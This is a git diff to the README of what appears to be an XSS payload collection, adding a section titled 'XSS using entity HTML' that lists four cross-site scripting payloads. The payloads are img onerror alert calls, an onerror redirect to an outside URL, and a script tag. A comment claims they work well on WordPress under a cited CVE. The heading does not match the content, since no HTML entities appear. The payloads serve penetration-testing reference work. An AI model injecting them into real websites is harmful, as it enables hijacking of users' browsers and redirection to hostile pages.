diff --git a/XSS Injection/README.md b/XSS Injection/README.md index 94fb730d3e..6264f30207 100644 --- a/XSS Injection/README.md +++ b/XSS Injection/README.md @@ -214,6 +214,16 @@ Most tools are also suitable for blind XSS attacks:
MOVE HERE
MOVE HERE
``` +### XSS using entity HTML + +```javascript +// Works very good at Wordpress (CVE-2025-14588) + +<img src=x onerror=alert(1)> +<img src=x onerror=window.location.href="https://example.com"> +<img src=1 onerror="alert(1)"> +<script>alert(1)</script> +``` ### XSS using HTML5 tags